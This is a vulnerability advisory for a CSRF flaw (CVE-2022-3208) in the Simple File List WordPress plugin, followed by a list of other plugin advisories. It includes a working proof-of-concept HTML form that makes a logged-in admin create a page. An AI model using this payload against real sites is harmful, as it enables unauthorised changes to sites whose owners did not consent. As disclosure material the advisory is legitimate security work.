Simple File List < 4.4.13 – Page Creation via CSRF | CVE 2022-3208 | Plugin Vulnerabilities

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin create new page and change it's content via a CSRF attack.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="eeShortcode" value="Page Content" />
      <input type="hidden" name="eeCreatePostType" value="Page" />
      <input type="hidden" name="eeGo" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

simple-file-list

Fixed in 4.4.13

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

80d475ca-b475-4789-8eef-9c4d880853b7

Timeline

Publicly Published

2022-09-19 (about 3 years ago)

Added

2022-09-19 (about 3 years ago)

Last Updated

2022-09-19 (about 3 years ago)

Other

Published

Title

Published

2025-11-17

Title

Coil Web Monetization <= 2.0.2 - Cross-Site Request Forgery

Published

2025-01-08

Title

Action Network < 1.8.0 - Reflected Cross-Site Scripting

Published

2024-10-14

Title

cSlider <= 2.4.2 - Cross-Site Request Forgery

Published

2024-12-05

Title

Country Blocker <= 3.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-04-18

Title

KiotViet Sync <= 1.8.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting